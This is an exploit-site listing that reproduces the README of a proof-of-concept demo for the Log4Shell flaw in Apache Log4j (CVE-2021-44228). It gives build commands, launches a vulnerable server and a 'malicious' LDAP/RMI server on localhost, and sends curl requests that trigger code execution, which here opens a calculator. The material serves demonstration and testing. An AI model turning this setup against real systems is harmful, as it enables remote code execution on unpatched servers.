Exploit for Improper Input Validation in Apache Log4J CVE-2021-44228

Name: Exploit for Improper Input Validation in Apache Log4J CVE-2021-44228
Rating: 5 (136 reviews)

2021-12-13 | CVSS 9.3

## https://sploitus.com/exploit?id=6AC0E68D-D6F7-55D9-A281-30D7E76D7556
# log4j-CVE-2021-44228-test
demo projects to highlight how to execute the log4j (CVE-2021-44228) vulnerability

used spring boot just to be quickly set up. you'll have to excuse all the hard coding, it was just a POC.

## Usage
Have Java 8 installed. Build using maven ```mvn clean package -DskipTests```. Run these commands in separate shell windows:
```shell
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
```

This should execute the code in the Exploit class (which will just open up the calculator)